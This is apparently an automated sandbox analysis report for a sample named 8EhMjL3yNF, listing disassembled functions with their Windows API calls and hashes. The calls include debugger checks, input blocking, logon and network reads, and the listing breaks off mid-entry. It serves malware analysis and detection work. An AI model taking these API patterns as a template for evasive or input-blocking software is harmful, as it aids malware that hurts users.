                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3541575487-0
                                                                                                                                                                  • Opcode ID: 6055aee70b5594e04af3cc97ca5df33eab635db205e1b0d95dafa989526a10af
                                                                                                                                                                  • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                                                                                                                  • Opcode Fuzzy Hash: 6055aee70b5594e04af3cc97ca5df33eab635db205e1b0d95dafa989526a10af
                                                                                                                                                                  • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                                                                                                                  Function 00417DAA Relevance: 4.6, APIs: 3, Instructions: 75COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,00000001,00000000), ref: 00417E94
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00000001,00000000), ref: 00417E9E
                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(00401884,?,00000001,00000000), ref: 00417EAB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                  • Opcode ID: 42f93e18c6965526c6f2e22395c6ba628ee7d052eafe2f53a52ba4c41b503b79
                                                                                                                                                                  • Instruction ID: 31b9ab21867ad1b842961dd6fee13a806953e064714b7494ebc73d94b307db22
                                                                                                                                                                  • Opcode Fuzzy Hash: 42f93e18c6965526c6f2e22395c6ba628ee7d052eafe2f53a52ba4c41b503b79
                                                                                                                                                                  • Instruction Fuzzy Hash: 0931E6B49013189BCB25DF25E9887DDB7B8BF08314F2045EEE41DA6291D7785B858F48
                                                                                                                                                                  Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 48322524-0
                                                                                                                                                                  • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                                                                                  • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                                                                                                                  • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                                                                                  • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                                                                                                                  Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                                                                                                                  • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                                                                                                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 901099227-0
                                                                                                                                                                  • Opcode ID: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                                                                                                                                                                  • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                                                                                                                  • Opcode Fuzzy Hash: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                                                                                                                                                                  • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                                                                                                                  Function 0044F430 Relevance: 3.0, Strings: 2, Instructions: 458COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: U$\
                                                                                                                                                                  • API String ID: 0-100911408
                                                                                                                                                                  • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                                                                                                  • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                                                                                                                  • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                                                                                                  • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                                                                                                                  Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Proc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2346855178-0
                                                                                                                                                                  • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                                                                                  • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                                                                                                                  • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                                                                                  • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                                                                                                                  Function 0042096F Relevance: 1.8, Strings: 1, Instructions: 517COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                                  • Opcode ID: ffc2c54a803d8e62ee64ba702a71a0c2ad33d9a94fd471698b382dbafb19470f
                                                                                                                                                                  • Instruction ID: 1b4906d9f21e259b66daec5d2a4723cdb99d299d7388338d70b106eeb17f64f0
                                                                                                                                                                  • Opcode Fuzzy Hash: ffc2c54a803d8e62ee64ba702a71a0c2ad33d9a94fd471698b382dbafb19470f
                                                                                                                                                                  • Instruction Fuzzy Hash: 3812C672E106298BDF04CF68E8402EDB7F2FBDC324F65866AD822B7291C7746945CB54
                                                                                                                                                                  Function 00420EC0 Relevance: 1.8, Strings: 1, Instructions: 517COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                                  • Opcode ID: 35f29efe896d92e278ea5730d8026191a9a27f48d539ee70e39862e3a79d8b72
                                                                                                                                                                  • Instruction ID: 0afce909dabaa5e95ec5d1ea5a481b42890bf02549eecc74570a87147bc0db1b
                                                                                                                                                                  • Opcode Fuzzy Hash: 35f29efe896d92e278ea5730d8026191a9a27f48d539ee70e39862e3a79d8b72
                                                                                                                                                                  • Instruction Fuzzy Hash: BE12C772E005298BDF04CF68E8406FDB7B2FB9C324F65866AD922B76A0C3756905CB54
                                                                                                                                                                  Function 0041C9AE Relevance: 1.8, APIs: 1, Instructions: 266COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RaiseException.KERNEL32(?,00000000,00000001,?,00000000,0000FFFF,?,?,0041D021,?,?,?,?,?,?,00000000), ref: 0041CBD2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                                                  • Opcode ID: be9b892149dac616f6f2b4bb9e12525933cb1ef408c0ce5f8a17f829d6645e12
                                                                                                                                                                  • Instruction ID: 35e32dd4fa6ffe26e0583047641d8dd1063716a1bc02121514e6ae778c8d8cb2
                                                                                                                                                                  • Opcode Fuzzy Hash: be9b892149dac616f6f2b4bb9e12525933cb1ef408c0ce5f8a17f829d6645e12
                                                                                                                                                                  • Instruction Fuzzy Hash: C5B17B31510609CFD718CF18C8D6AA67BE0FF45354F19865EE99ACF2A1C738E991CB88
                                                                                                                                                                  Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • BlockInput.USER32(00000001), ref: 0045A38B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BlockInput
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3456056419-0
                                                                                                                                                                  • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                                                                                  • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                                                                                                                  • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                                                                                  • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                                                                                                                  Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LogonUser
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1244722697-0
                                                                                                                                                                  • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                                                                                  • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                                                                                                                  • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                                                                                  • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                                                                                                                  Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: NameUser
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2645101109-0
                                                                                                                                                                  • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                                                                                  • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                                                                                                                  • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                                                                                  • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                                                                                                                  Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                  • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                                                                                  • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                                                                                                                  • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                                                                                  • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                                                                                                                  Function 00413801 Relevance: 1.5, Strings: 1, Instructions: 217COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: h?C
                                                                                                                                                                  • API String ID: 0-244218268
                                                                                                                                                                  • Opcode ID: 263699aeed138e65ea62b43b4f045f44a857ce7ded7795ced79133f4b88d6354
